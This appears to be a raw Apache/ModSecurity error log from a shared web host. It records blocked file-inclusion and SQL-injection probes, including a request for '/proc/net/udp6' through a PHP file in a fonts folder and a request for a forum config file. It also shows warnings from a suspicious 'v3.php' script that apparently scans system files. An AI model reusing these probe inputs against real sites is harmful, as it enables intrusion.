[Mon May 11 20:22:13.091003 2026] [security2:error] [pid 1501831:tid 1501850] [client 43.167.241.46:50336] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIeVVNddpkriGUb6ZVrdwAAARE"], referer: http://www.tchatbooster.com
[Mon May 11 20:22:57.410202 2026] [security2:error] [pid 1511173:tid 1511179] [client 216.73.216.110:51742] ModSecurity: Warning. Matched phrase "config.inc.php" at ARGS:rename. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config.inc.php found within ARGS:rename: forumconfig.inc.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agIegfjVc-A-CSptvm1mkQAAAEM"]
[Mon May 11 20:22:57.411145 2026] [security2:error] [pid 1511173:tid 1511179] [client 216.73.216.110:51742] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agIegfjVc-A-CSptvm1mkQAAAEM"]
[Mon May 11 20:22:57.499106 2026] [security2:error] [pid 1511173:tid 1511179] [client 216.73.216.110:51742] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIegfjVc-A-CSptvm1mkQAAAEM"]
[Mon May 11 20:23:18.712200 2026] [core:error] [pid 1516058:tid 1516095] [client 34.162.62.106:44840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:18.712991 2026] [core:error] [pid 1516058:tid 1516095] [client 34.162.62.106:44840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:18.942724 2026] [core:error] [pid 1502013:tid 1502032] [client 34.162.62.106:44844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:18.942936 2026] [core:error] [pid 1502013:tid 1502032] [client 34.162.62.106:44844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:19.386517 2026] [core:error] [pid 1511173:tid 1511189] [client 34.162.62.106:44852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:19.386557 2026] [core:error] [pid 1511173:tid 1511189] [client 34.162.62.106:44852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:19.614388 2026] [core:error] [pid 1501883:tid 1501892] [client 34.162.62.106:44858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:19.614435 2026] [core:error] [pid 1501883:tid 1501892] [client 34.162.62.106:44858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:19.855217 2026] [core:error] [pid 1502013:tid 1502035] [client 34.162.62.106:44866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:19.855262 2026] [core:error] [pid 1502013:tid 1502035] [client 34.162.62.106:44866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:20.085462 2026] [core:error] [pid 1511173:tid 1511198] [client 34.162.62.106:44882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:23:20.085494 2026] [core:error] [pid 1511173:tid 1511198] [client 34.162.62.106:44882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:24:09.519418 2026] [security2:error] [pid 1534836:tid 1534894] [client 43.159.62.163:44298] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIeydeaRXe5lR8y0ZOIFgAAAVc"]
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/31/6f1260b949023b936dad89521d017e169906a1 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/31/6f1260b949023b936dad89521d017e169906a1 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:24:35.725240 2026] [:error] [pid 1501831:tid 1501848] [client 104.210.140.142:64040] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 20:25:01.340645 2026] [security2:error] [pid 1501883:tid 1501908] [client 43.134.121.208:50126] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/mentions-legales/"] [unique_id "agIe_TP5Q_-MBliRCAxcwgAAABc"]
[Mon May 11 20:25:52.174315 2026] [security2:error] [pid 1534836:tid 1534884] [client 43.165.198.5:35354] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIfMNeaRXe5lR8y0ZOIjwAAAU0"]
[Mon May 11 20:26:25.119409 2026] [security2:error] [pid 1501831:tid 1501835] [client 216.73.216.110:41539] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's1v' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s1v found within ARGS:video: '4@"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.missmandarine.com"] [uri "/news/"] [unique_id "agIfUVNddpkriGUb6ZVsdQAAAQI"]
[Mon May 11 20:26:25.119722 2026] [security2:error] [pid 1501831:tid 1501835] [client 216.73.216.110:41539] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/news/"] [unique_id "agIfUVNddpkriGUb6ZVsdQAAAQI"]
[Mon May 11 20:26:25.267435 2026] [security2:error] [pid 1501831:tid 1501835] [client 216.73.216.110:41539] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIfUVNddpkriGUb6ZVsdQAAAQI"]
[Mon May 11 20:26:36.391906 2026] [security2:error] [pid 1502013:tid 1502041] [client 43.134.53.242:52260] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2025/10/Mael-Bailly-catalogue.pdf"] [unique_id "agIfXJYn-x0CHsbEbP2izgAAAI4"]
[Mon May 11 20:27:11.059068 2026] [security2:error] [pid 1516058:tid 1516106] [client 216.73.216.110:23781] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/net/udp found within ARGS:filesrc: /proc/net/udp6"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIffyMeXtzav-mi9Syl-gAAANA"]
[Mon May 11 20:27:11.060310 2026] [security2:error] [pid 1516058:tid 1516106] [client 216.73.216.110:23781] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIffyMeXtzav-mi9Syl-gAAANA"]
[Mon May 11 20:27:11.160312 2026] [security2:error] [pid 1516058:tid 1516106] [client 216.73.216.110:23781] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIffyMeXtzav-mi9Syl-gAAANA"]
[Mon May 11 20:27:24.521643 2026] [autoindex:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:27:25.100047 2026] [autoindex:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:27:25.644209 2026] [autoindex:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:27:25.986830 2026] [security2:error] [pid 1534836:tid 1534884] [client 49.233.45.47:53022] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/"] [unique_id "agIfjdeaRXe5lR8y0ZOI9QAAAU0"]
[Mon May 11 20:27:26.172200 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:26.711951 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:27.240970 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:27.770609 2026] [autoindex:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:27:28.477622 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:29.019962 2026] [security2:error] [pid 1534836:tid 1534873] [client 49.233.45.47:55394] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/"] [unique_id "agIfkdeaRXe5lR8y0ZOI_AAAAUI"], referer: http://homin.fr
[Mon May 11 20:27:29.055840 2026] [autoindex:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:27:29.608794 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:30.662317 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:31.393012 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:31.487106 2026] [security2:error] [pid 1516058:tid 1516090] [client 43.165.198.224:50148] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIfkyMeXtzav-mi9SymFAAAAMA"]
[Mon May 11 20:27:31.937567 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:32.489689 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:32.927190 2026] [security2:error] [pid 1534836:tid 1534883] [client 89.124.67.191:53940] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: a8f6370e5dc6200d791f74dc13fa1bc7||1778525838||1778525478"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIflNeaRXe5lR8y0ZOJAgAAAUw"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 20:27:32.927837 2026] [security2:error] [pid 1534836:tid 1534883] [client 89.124.67.191:53940] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIflNeaRXe5lR8y0ZOJAgAAAUw"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 20:27:32.931937 2026] [security2:error] [pid 1534836:tid 1534883] [client 89.124.67.191:53940] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIflNeaRXe5lR8y0ZOJAgAAAUw"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 20:27:33.030176 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:33.650692 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:34.367236 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:34.911580 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:35.439001 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:35.975903 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:36.505356 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:37.032008 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:37.563991 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:38.095717 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:38.734653 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:39.320825 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:39.865950 2026] [autoindex:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:27:40.426531 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:40.960091 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:41.499150 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:42.024848 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:42.549967 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:43.076295 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:43.627643 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:44.171483 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:44.700536 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:45.232218 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:45.802262 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:46.348642 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:46.875719 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:47.403094 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:47.934937 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:48.523845 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:49.157151 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:49.684980 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:50.213208 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:50.786277 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:51.314036 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:51.853845 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:52.389071 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:52.916949 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
